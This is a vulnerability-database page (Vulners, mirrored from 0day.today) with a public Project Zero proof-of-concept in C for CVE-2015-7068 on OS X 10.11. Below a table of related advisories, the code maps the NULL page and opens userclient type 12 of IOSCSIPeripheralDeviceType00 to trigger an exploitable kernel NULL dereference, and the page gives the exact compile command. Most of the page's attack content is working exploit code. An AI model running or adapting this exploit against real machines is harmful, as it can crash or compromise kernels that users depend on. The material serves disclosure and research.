Vulners
Lucene search
Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Mac OS X 10.11.x < 10.11.2 Multiple Vulnerabilities | 27 May 201600:00 | – | nessus |
| Apple iOS < 9.2 Multiple Vulnerabilities | 26 May 201600:00 | – | nessus |
| Apple TV < 9.1 Multiple Vulnerabilities | 27 May 201600:00 | – | nessus |
| MantisBT 1.x < 1.3.0-beta.1 Information Disclosure | 18 Jan 201700:00 | – | nessus |
| Apple TV < 9.1 Multiple Vulnerabilities | 13 Oct 201600:00 | – | nessus |
| Apple iOS < 9.2 Multiple Vulnerabilities | 10 Dec 201500:00 | – | nessus |
| Mac OS X 10.11.x < 10.11.2 Multiple Vulnerabilities | 10 Dec 201500:00 | – | nessus |
| Mac OS X Multiple Vulnerabilities (Security Updates 2015-005 / 2015-008) | 11 Dec 201500:00 | – | nessus |
 | The vulnerabilities in iOS and Mac OS X operating systems allow attackers to trigger service failures or execute arbitrary code in privileged contexts. | 19 Jan 201600:00 | – | bdu_fstec |
 | CVE-2015-7068 | 28 Jan 201600:00 | – | circl |
10
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=562
Opening userclient type 12 of IOSCSIPeripheralDeviceType00 leads to an exploitable kernel NULL dereference.
Tested on OS X 10.11 ElCapitan (15a284) on MacBookAir5,2
*/
// ianbeer
// clang -o scsi_peripheral scsi_peripheral.c -m32 -framework IOKit -g -pagezero_size 0x0
/*
Opening userclient type 12 of IOSCSIPeripheralDeviceType00 leads to an exploitable kernel NULL dereference
Tested on OS X 10.11 ElCapitan (15a284) on MacBookAir5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
io_connect_t conn = MACH_PORT_NULL;
int main() {
kern_return_t err;
// re map the null page rw
int var = 0;
err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
if (err != KERN_SUCCESS){
printf("%x\n", err);
}
vm_address_t addr = 0;
err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
if (err != KERN_SUCCESS){
if (err == KERN_INVALID_ADDRESS){
printf("invalid address\n");
}
if (err == KERN_NO_SPACE){
printf("no space\n");
}
printf("%x\n", err);
}
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = 'A';
}
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSCSIPeripheralDeviceType00"));
if (service == MACH_PORT_NULL) {
printf("can't find service\n");
return 0;
}
IOServiceOpen(service, mach_task_self(), 12, &conn); // <-- userclient type 12
if (conn == MACH_PORT_NULL) {
printf("can't connect to service\n");
return 0;
}
printf("boom?\n");
return 0;
}
# 0day.today [2018-01-09] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jan 2016 00:00Current
7.7High risk
Vulners AI Score7.7
EPSS0.03935